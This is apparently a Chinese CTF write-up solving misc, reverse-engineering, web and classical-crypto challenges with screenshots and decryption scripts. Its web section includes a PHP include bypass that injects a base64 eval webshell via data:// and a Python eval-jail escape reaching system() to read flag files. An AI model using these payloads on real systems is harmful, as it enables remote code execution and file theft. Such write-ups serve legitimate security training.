misc

AmazingGame

题目内容:

出题人们都好狠啊,题做累了不如来玩玩游戏吧,还有就是,安卓软件私有数据会放在哪?(游戏至少通过一个关卡才会有存档)

好不容易用鼠标打了一关,改了存档似乎没啥用,没仔细研究

/data/data

image-20241014020557476

搜索一下关键字unlockedtracks

屏幕截图 2024-10-13 233657

ez_jail

no {} no cpp?

感谢csdn

c/c++中<%%>可代替{}

void user_code() <%
    std::cout << "Hello, World!";
%>

image-20241014015905618

dm9pZCB1c2VyX2NvZGUoKSA8JQ0KICAgIHN0ZDo6Y291dCA8PCAiSGVsbG8sIFdvcmxkISI7DQolPg==

image-20241014020509431

BGM坏了吗?

题目内容:

刚想听一篇推文,但是bgm吵死了,我忍了又忍,摈除杂音仔细听,up难道在拨号吗?(以flag{}形式提交)

剪出最后一段

image-20241014040024738

DTMF

image-20241014040114966

OSINT-MASTER

题目内容:

我重生了,上一世最后一刻我是在一架飞机上。
这一世,我拿着手上这张照片,下定决心,一定要找到之前坐过的那架航班!
flag格式:flag{航班号_照片拍摄时飞机经过的地级市}
示例:flag{YU8915_廊坊市}

图片中有时间信息和飞机注册号

image-20241014134236098

image-20241014134319918

image-20241014134129486

re

011vm

题目内容:

欢迎来到混淆专场

d810反混淆器ollvm去平坦化

image-20241014035411829

动调半天分析全是混淆,属于是学到什么是混淆了

tea

image-20241014035141819

enc和key

image-20241014035040716

#include <stdio.h>
#include <stdint.h>

void decrypt(uint32_t* v, uint32_t* k) {
	uint32_t v0 = v[0], v1 = v[1], sum = 0xC6EF3720, i;	//这里的sum是0x9e3779b9*32后截取32位的结果,截取很重要。
	uint32_t delta = 0x9e3779b9;
	uint32_t k0 = k[0], k1 = k[1], k2 = k[2], k3 = k[3];
	for (i = 0;i < 32;i++) {
		v1 -= ((v0 << 4) + k2) ^ (v0 + sum) ^ ((v0 >> 5) + k3);
		v0 -= ((v1 << 4) + k0) ^ (v1 + sum) ^ ((v1 >> 5) + k1);
		sum -= delta;
	}
	v[0] = v0;v[1] = v1;
}

int main()
{
	uint64_t v[4] = { 0xB7E510C138B97E28, 0x5593BBD7B4B29FAE ,0x1671C6373C2E9B9E , 0x5116E5158F3A8CB5 };
	uint32_t k[4] = { 0x11121314,0x22232425,0x33343536,0x41424344 };

	
	printf("加密前的数据:%x %x\n", (uint32_t)v, *((uint32_t*)&v + 1));	//%u 以十进制形式输出无符号整数 
	for (int i = 0; i < 4; i++)
	{
		decrypt((uint32_t*)&v+2*i, k);

	}
	printf("加密前的数据:%x %x\n", (uint32_t)v, *((uint32_t*)&v + 1));	//%u 以十进制形式输出无符号整数 
	for (int i = 0; i < 32; i++)
	{
		printf("%c", *((char*)&v + i));

	}
	return 0;
}

PangBai 过家家(3)

题目内容:

PangBai 住院了,医生说他体内大量的丙酮酸羧化酶(PYC)基因被 DNA 内切酶所“解开”,导致丙酮酸难以羧化为草酰乙酸,从而阻止了糖异生和谷氨酸生成,导致神经递质分泌不足并引发昏厥症状。医生根据条斑紫菜叶状体中的 PyPYC 序列构建了能够通过 MCT4 转运蛋白、含 PYC 基因的病毒体对 PangBai 进行注射,两个系统时后,PangBai 体内葡萄糖和胰岛素水平恢复正常,相关二元反射均正常。医生和我说可以准备出院手续了。(以上内容不包含专业性医学建议或指导)

这题python3.12出的题

搭配使用上面两个工具,使用最新版,第二个需cmake编译

exe->pyc

python .\pyinstxtractor.py .\NotNormalExe.exe

image-20241017135223287

pyc(NotNormalExe.exe_extracted中)->py

pycdc.exe -o .\NotNormalExe.py .\NotNormalExe.pyc

NotNormalExe.py

# Source Generated with Decompyle++
# File: NotNormalExe.pyc (Python 3.12)

import sys
print('Welcome to NewStar~')
print('Please input the flag:')
enc = [
    40,
    9,
    22,
    52,
    15,
    56,
    66,
    71,
    111,
    121,
    90,
    33,
    18,
    40,
    3,
    13,
    80,
    28,
    65,
    68,
    83,
    88,
    34,
    86,
    5,
    12,
    35,
    82,
    67,
    3,
    17,
    79]
key = 'NewStar2024'
input = input('> ')
if len(input) != len(enc):
    print('Wrong flag, try again!')
    sys.exit(0)
# WARNING: Decompyle incomplete

exp

enc = [
    40, 9, 22, 52, 15, 56, 66, 71, 111, 121, 90, 33,
    18, 40, 3, 13, 80, 28, 65, 68, 83, 88, 34, 86,
    5, 12, 35, 82, 67, 3, 17, 79
]
key = 'NewStar2024'
flag = ''

# 通过循环使用 key 中的字符对 enc 进行解密
for i in range(len(enc)):
    flag += chr(enc[i] ^ ord(key[i % len(key)]))

print("Decrypted flag:", flag)

simpleAndroid

jni

image-20241017172229892

先用UseLess加密,再反转,再字节前后四位互换

image-20241017172155807

换表base64

image-20241017172215443

exp

data_1 = [178, 116, 69, 22, 71, 52, 149, 54, 23, 244, 67, 149, 3, 214, 51, 149, 198, 214, 51, 54, 167, 53, 230, 54, 150, 87, 67, 22, 150, 151, 230, 22]

def decrypt(data):
    processed = []
    for byte in data:
        original_value = ((byte & 0x0F)<<4) | ((byte >> 4) & 0xFF)
        processed.append(original_value)

    length=len(processed)
    for i in range(length//2):
        processed[i], processed[length - i - 1] = processed[length - i - 1], processed[i]

    result = ''.join(chr(b) for b in processed)
    return result
def base64_decode(encoded_str):
    CHAR_DATA = "BCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/A"
    output = []
    i = 0

    while i < len(encoded_str):
        b1 = CHAR_DATA.index(encoded_str[i])
        i += 1

        # 如果到达字符串末尾
        if i == len(encoded_str):
            output.append(chr(b1 << 2))
            break

        # 获取 b2
        b2 = CHAR_DATA.index(encoded_str[i])
        i += 1

        # 处理 padding
        if i == len(encoded_str):
            output.append(chr((b1 << 2) | (b2 >> 4)))
            break

        # 获取 b3
        b3 = CHAR_DATA.index(encoded_str[i])
        i += 1

        # 获取 b4
        b4 = CHAR_DATA.index(encoded_str[i])
        i += 1

        # 解码
        output.append(chr((b1 << 2) | (b2 >> 4)))
        output.append(chr(((b2 & 0x0F) << 4) | (b3 >> 2)))
        output.append(chr(((b3 & 0x03) << 6) | b4))

    return ''.join(output)

# 测试解密
decrypted_string = decrypt(data_1)
print("Decrypted String:", decrypted_string)

encoded_str = decrypted_string  # 替换为你的 Base64 编码字符串
decoded_str = base64_decode(encoded_str)
print(decoded_str)



SMc_math

题目内容:

Simultaneous Multivariate Calculations——我才不会告诉你SMC其实是双关呢!

smc程序自改

image-20241017151142198

对于encrypt地址后0x3D5字节进行异或0x3E

动调自改发现反编译失败,干脆手动改

from idaapi import*
addr=0x11E9
while addr!=0x11E9+0x3D6:
    byte=get_byte(addr)^0x3E
    print(hex(addr),byte)
    patch_byte(addr,byte)
    addr+=1

image-20241017150017758

解密exp

from sympy import symbols, Eq, solve
import struct

v2, v3, v4, v5, v6, v7, v8 = symbols('v2 v3 v4 v5 v6 v7 v8')

eq1 = Eq(5 * (v2 + v3) + 4 * v4 + 6 * v5 + v6 + 9 * v8 + 2 * v7, 0xD5CC7D4FF)
eq2 = Eq(4 * v8 + 3 * v5 + 6 * v4 + 10 * v3 + 9 * v2 + 9 * v7 + 3 * v6, 0x102335844B)
eq3 = Eq(9 * v6 + 4 * (v5 + v4) + 5 * v3 + 4 * v2 + 3 * v8 + 10 * v7, 0xD55AEABB9)
eq4 = Eq(9 * v3 + 5 * v2 + 9 * v8 + 2 * (v4 + 2 * v5 + 5 * v6 + v7), 0xF89F6B7FA)
eq5 = Eq(5 * v6 + 9 * v5 + 7 * v2 + 2 * v3 + v4 + 3 * v8 + 9 * v7, 0xD5230B80B)
eq6 = Eq(8 * v8 + 6 * v5 + 10 * v4 + 5 * v3 + 6 * v2 + 3 * v7 + 9 * v6, 0x11E28ED873)
eq7 = Eq(v2 + 4 * (v4 + v3 + 2 * v5) + 9 * v6 + v7 + 3 * v8, 0xB353C03E1)

solution = solve([eq1, eq2, eq3, eq4, eq5, eq6, eq7], (v2, v3, v4, v5, v6, v7, v8))


print(solution)
result_string = ""
for key in solution:
    result_string += struct.pack("<I", solution[key]).decode()  # ">I"表示大端32位无符号整数

print("Decrypted string:", result_string)

取啥名好呢?

请看CSAPP。这题解法很多,解出来就行了(没有答疑什么的,直接去看书)

setjmp类似一个存档点,对应longjmp为读档点

image-20241020152916471

signal用于接受异常信号,类似于支线任务,触发就会跳转执行

信号 处理动作 发出信号的原因
SIGHUP 1 A 终端挂起或者控制进程终止
SIGINT 2 A 键盘中断(如 break 键被按下)
SIGQUIT 3 C 键盘的退出键被按下
SIGILL 4 C 非法指令
SIGABRT 6 C 由 abort(3) 发出的退出指令
SIGFPE 8 C 浮点异常
SIGKILL 9 AEF Kill 信号
SIGSEGV 11 C 无效的内存引用
SIGPIPE 13 A 管道破裂: 写一个没有读端口的管道
SIGALRM 14 A 由 alarm(2) 发出的信号
SIGTERM 15 A 终止信号
SIGUSR1 30, 10, 16 A 用户自定义信号 1
SIGUSR2 31, 12, 17 A 用户自定义信号 2
SIGCHLD 20, 17, 18 B 子进程结束信号
SIGCONT 19, 18, 25 进程继续(曾被停止的进程)
SIGSTOP 17, 19, 23 DEF 终止进程
SIGTSTP 18, 20, 24 D 控制终端(tty)上按下停止键
SIGTTIN 21, 21, 26 D 后台进程企图从控制终端读
SIGTTOU 22, 22, 27 D 后台进程企图从控制终端写

image-20241020151724256

段错误,对应signal值11

image-20241020151603143

跳转func2,读档回溯到switch,env被设为2

image-20241020152235222

非法指令

image-20241020153251767

进入handler读档

image-20241020153348459

进入case 1,没有触发异常,break

image-20241020154045892

除0,signal8捕获

image-20241020155249212

进入func1,与除0构成一个循环,对1-22进行加密

image-20241020155612442

exp

enc=[0x4f,0x54,0x48,0x53,0x60,0x45,0x37,0x1a,0x28,0x41,0x26,0x16,0x3b,0x45,0x14,0x47,0xe,0xc,0x70,0x3b,0x3c,0x3d,0x70]

for i in range(1,23):
    enc[i]^=i

for i in range(23):
    enc[i] -= 0xE9
    enc[i] &= 0xff
    print(chr(enc[i]),end="")

flowering_shrubs

三处加密,也算是分组内循环加密(不知道怎么叫)

image-20241020205028371

image-20241020204940587

image-20241020205906314

判断位置

image-20241020204504518

key对密文的分组加密顺序为1-2-9-4-3-7-5-6-8-10

image-20241020204531641

fake_key="uarefirst."
enc=[0x54,0xf4,0x20,0x47,0xfc,0xc4,0x93,0xe6,0x39,0xe0,0x6e,0x0,0xa5,0x6e,0xaa,0x9f,0x7a,0xa1,0x66,0x39,0x76,0xb7,0x67,0x57,0x3d,0x95,0x61,0x22,0x55,0xc9,0x3b,0x4e,0x4f,0xe8,0x66,0x8,0x3d,0x50,0x43,0x3e]
key=[fake_key[0],fake_key[1],fake_key[4],fake_key[3],fake_key[6],fake_key[7],fake_key[5],fake_key[8],fake_key[2],fake_key[9]]
for i in range(10):
    enc[4*i] ^= enc[4*i+3]
    enc[4*i+3] ^= enc[4*i+2]
    enc[4*i+2] += ord(key[i])
    enc[4*i+2] &= 0xff
    enc[4*i+2] ^= enc[4*i+1]
    enc[4*i+1] -= ord(key[i])
    enc[4*i+1] ^= enc[4*i]
    enc[4*i] ^= ord(key[i])
for i in enc:
    print(chr(i),end="")

这题也是做的挺坎坷,一开始动调分析完加密逻辑后解密怎么都不对,后来试过四字符爆破,密钥爆破,patch排除各种原因,没想到是加密顺序的问题,可能是rand随机数控制顺序还是太菜了

web

Include Me

题目内容:

兄弟包一下

<?php
highlight_file(__FILE__);
function waf(){
    if(preg_match("/<|\?|php|>|echo|filter|flag|system|file|%|&|=|`|eval/i",$_GET['me'])){
        die("兄弟你别包");
    };
}
if(isset($_GET['phpinfo'])){
    phpinfo();
}

//兄弟你知道了吗?
if(!isset($_GET['iknow'])){
    header("Refresh: 5;url=https://cn.bing.com/search?q=php%E4%BC%AA%E5%8D%8F%E8%AE%AE");
}

waf();
include $_GET['me'];
echo "兄弟你好香";
?>

data://封装协议直接梭

?iknow&me=data://text/plain;base64,PD9waHAgQGV2YWwoJF9HRVRbY21kXSk7Pz4&cmd=system('cat /f*');

image-20241014141921004

臭皮踩踩背

题目内容:

老爷爷,为了给你踩背,我一定要从这里逃出去!!!

print('你被豌豆关在一个监狱里,,,,,,')
print('豌豆百密一疏,不小心遗漏了一些东西,,,')
print('''def ev4l(*args):\n\tprint(secret)\ninp = input("> ")\nf = lambda: None\nprint(eval(inp, {"__builtins__": None, 'f': f, 'eval': ev4l}))''')
print('能不能逃出去给豌豆踩踩背就看你自己了,臭皮,,')


def ev4l(*args):
    print(secret)

secret = '你已经拿到了钥匙,但是打开错了门,好好想想,还有什么东西是你没有理解透的?'

inp = input("> ")

f = lambda: None

if "f.__globals__['__builtins__'].eval" in inp:
    f.__globals__['__builtins__'].eval = ev4l
else:
    f.__globals__['__builtins__'].eval = eval

try:
    print(eval(inp, {"__builtins__": None, 'f': f, 'eval': ev4l}))
except Exception as e:
    print(f"Error: {e}")

image-20241014185801323

臭皮的计算机

和上题差不多,unicode绕过

[].__𝘤𝘭𝘢𝘴𝘴__.__𝘣𝘢𝘴𝘦__.__𝘴𝘶𝘣𝘤𝘭𝘢𝘴𝘴𝘦𝘴__()[-4].𝘤𝘭𝘰𝘴𝘦.__𝘨𝘭𝘰𝘣𝘢𝘭𝘴__[𝘤𝘩𝘳(115)+𝘤𝘩𝘳(121)+𝘤𝘩𝘳(115)+𝘤𝘩𝘳(116)+𝘤𝘩𝘳(101)+𝘤𝘩𝘳(109)](𝘤𝘩𝘳(99)+𝘤𝘩𝘳(97)+𝘤𝘩𝘳(116)+' /'+𝘤𝘩𝘳(102)+'*')

image-20241014211938287

Crypto

故事新编1

题目内容:

我亦曾无敌人间三百年

image-20241017174759952

from hashlib import md5
zen1  = '''
BEAUTIFUL IS BETTER THAN UGLY.
EXPLICIT IS BETTER THAN IMPLICIT.
SIMPLE IS BETTER THAN COMPLEX.
COMPLEX IS BETTER THAN COMPLICATED.
FLAT IS BETTER THAN NESTED.
SPARSE IS BETTER THAN DENSE.
FLAGA IS VEGENERE
READABILITY COUNTS.
SPECIAL CASES AREN'T SPECIAL ENOUGH TO BREAK THE RULES.
ALTHOUGH PRACTICALITY BEATS PURITY.
ERRORS SHOULD NEVER PASS SILENTLY.
UNLESS EXPLICITLY SILENCED.

'''
key1 = "subtitution"
def enc1(plaintext, key):
    def shift_char(c, k):
        return chr(((ord(c) - ord('A') + (ord(k) - ord('A'))) % 26) + ord('A'))

    plaintext = plaintext.upper()
    key = key.upper()
    ciphertext = []
    key_index = 0

    for char in plaintext:
        if char.isalpha():
            ciphertext.append(shift_char(char, key[key_index % len(key)]))
            key_index += 1
        else:
            ciphertext.append(char)

    return ''.join(ciphertext)
print('enc = \'\'\'' + enc1(zen1, key1)+'\'\'\'')
flag = b'flag{'+md5(zen1.encode()).hexdigest().encode()+b'}'
print(flag)
#----------------------------------------------
enc = '''
TYBNBBZNT WF TYUMMK NAIB HYFZ.
XFIFBKWG AM CXBMYK BVNF CNITBWBB.
GVEJMX QL VXBHRJ NITV VIFXZRP.
WPFXEYQ QG OWNUXZ MBTV QBEJMBKTNXL.
TYSN JL JXNMMF GZUO GMLNXL.
GCSLTX QL VXBHRJ NITV WYGAS.
SDUHT QL PXOSAWLF
KMTXTJWYANZ VWNHMA.
GCWWJTT VULMG NJYO'M AIYVQOY WHPNOA NH JFRSE UAM KOEMG.
NDNIHCZB IZOPLCDTTBNR JSNLM QNZBNR.
MFEGLT LPHOEL BRNYS IILM LQZRFNMR.
CGFXAG RPJMBKBNEG GVDYOVMW.
'''

故事新编2

image-20241021024948264

from hashlib import md5
zen2 = '''
IN THE FACE OF AMBIGUITY, REFUSE THE TEMPTATION TO GUESS.
THERE SHOULD BE ONE-- AND PREFERABLY ONLY ONE --OBVIOUS WAY TO DO IT.
ALTHOUGH THAT WAY MAY NOT BE OBVIOUS AT FIRST UNLESS YOU'RE DUTCH.
NOW IS BETTER THAN NEVER.
ALTHOUGH NEVER IS OFTEN BETTER THAN RIGHT NOW.
IF THE IMPLEMENTATION IS HARD TO EXPLAIN, IT'S A BAD IDEA.
IF THE IMPLEMENTATION IS EASY TO EXPLAIN, IT MAY BE A GOOD IDEA.

'''
key2 = "supersubtitution"
dict1 = {'A': 0, 'B': 1, 'C': 2, 'D': 3, 'E': 4,
         'F': 5, 'G': 6, 'H': 7, 'I': 8, 'J': 9,
         'K': 10, 'L': 11, 'M': 12, 'N': 13, 'O': 14,
         'P': 15, 'Q': 16, 'R': 17, 'S': 18, 'T': 19,
         'U': 20, 'V': 21, 'W': 22, 'X': 23, 'Y': 24, 'Z': 25}

dict2 = {0: 'A', 1: 'B', 2: 'C', 3: 'D', 4: 'E',
         5: 'F', 6: 'G', 7: 'H', 8: 'I', 9: 'J',
         10: 'K', 11: 'L', 12: 'M', 13: 'N', 14: 'O',
         15: 'P', 16: 'Q', 17: 'R', 18: 'S', 19: 'T',
         20: 'U', 21: 'V', 22: 'W', 23: 'X', 24: 'Y', 25: 'Z'}

def generate_key(message, key):
    for i in range(len(message)):
        if message[i].isalpha() == False:
            pass
        else:
            key += message[i]
    return key
def enc2(message, key):
    message = message.upper()
    key = key.upper()
    key_new = generate_key(message, key)
    cipher_text = ''
    i = 0
    for letter in message:
        if letter.isalpha():
            x = (dict1[letter]+dict1[key_new[i]]) % 26
            i += 1
            cipher_text += dict2[x]
        else:
            cipher_text += letter
    return cipher_text
print('enc = \'\'\'' + enc2(zen2, key2)+'\'\'\'')
flag = b'flag{'+md5(zen2.encode()).hexdigest().encode()+b'}'
print(flag)
#----------------------------------------------
enc = '''
AH ILV XUDX WY UFJWTCVMF, VJFWWS YHQ UMSJBTRZSS NG KNLWL.
XTTKE LPCHER HY SFW-- TUH GVWMSLLEMC CAPY BQT --FFAMFUT HYM GZ BC VX.
OMOPCOYD TFTH ZOG FAJ GVH VK VUCIHQS YF FGEGM VRZFNA MIM'RX ICKUA.
HBH MK TCHNVV WBTP URJAZ.
SMXAHYXA UEIRV DW FFEXU PYZARV OLRV JWLAX APA.
BY XYX PMCCMSLGGOPQTG PW PMGO XA IKILTQB, VB'K H BRG BRIX.
XQ TPR QFHLFMHVWETQTG PW MMHJ XA IKILTQB, VB EEY TC T USLS TDMN.
'''